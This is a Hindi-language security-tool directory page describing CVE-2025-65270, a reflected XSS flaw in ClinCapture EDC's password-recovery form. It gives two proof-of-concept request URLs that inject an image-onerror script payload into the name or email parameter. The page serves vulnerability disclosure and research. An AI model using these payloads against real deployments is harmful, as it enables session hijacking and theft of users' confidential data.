Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-65270 — ClinCapture EDC में Reflected XSS | Kitploit
उपकरण/GitHubGitHub/xh4vm/cve-2025-65270
भेद्यता विश्लेषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubxh4vm/cve-2025-65270

CVE-2025-65270

ClinCapture EDC में Reflected XSS

रिपॉजिटरी देखें
8 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-65270

⚠️ अस्वीकरण

यह रिपॉजिटरी केवल शैक्षिक और रक्षात्मक सुरक्षा अनुसंधान के लिए है

🔥 अवलोकन

ClinCapture EDC 3.0 और 2.2.3 में परावर्तित क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता, जो एक अप्रमाणित दूरस्थ हमलावर को पीड़ित के ब्राउज़र के संदर्भ में JavaScript कोड निष्पादित करने की अनुमति देती है।

poc_xss

🧪 प्रूफ ऑफ कॉन्सेप्ट

भेद्यता प्रदर्शित करने के लिए, आपको पासवर्ड पुनर्प्राप्ति टैब पर जाना होगा और पेलोड को नाम या ईमेल पैरामीटर में निर्दिष्ट करना होगा या एक अनुरोध भेजना होगा

🔓 नाम पैरामीटर के माध्यम से

root@kitploit:~
<url>/edc/RequestPassword?action=submit&name=text%22%3E%3Cimg%20src%3dx%20onerror%3dalert(document.cookie)%3E&[email protected]&passwdChallengeQuestion=favorite_animal&passwdChallengeAnswer=&Submit=Submit

poc_xss_1

🔓 ईमेल पैरामीटर के माध्यम से

root@kitploit:~
<url>/edc/RequestPassword?action=submit&name=text&[email protected]%22%3E%3Cimg%20src%3dx%20onerror%3dalert(document.cookie)%3E&passwdChallengeQuestion=favorite_animal&passwdChallengeAnswer=&Submit=Submit

poc_xss_2

🚨 प्रभाव

एक अप्रमाणित उपयोगकर्ता पीड़ित के ब्राउज़र के संदर्भ में JavaScript कोड निष्पादित कर सकता है, जिसका उद्देश्य पीड़ित की ओर से कार्य करना या गोपनीय जानकारी चुराना है, जैसे किसी सुरक्षा प्रश्न का उत्तर

🔗 संदर्भ

  • CVE-2025-65270
टूल डाउनलोड करें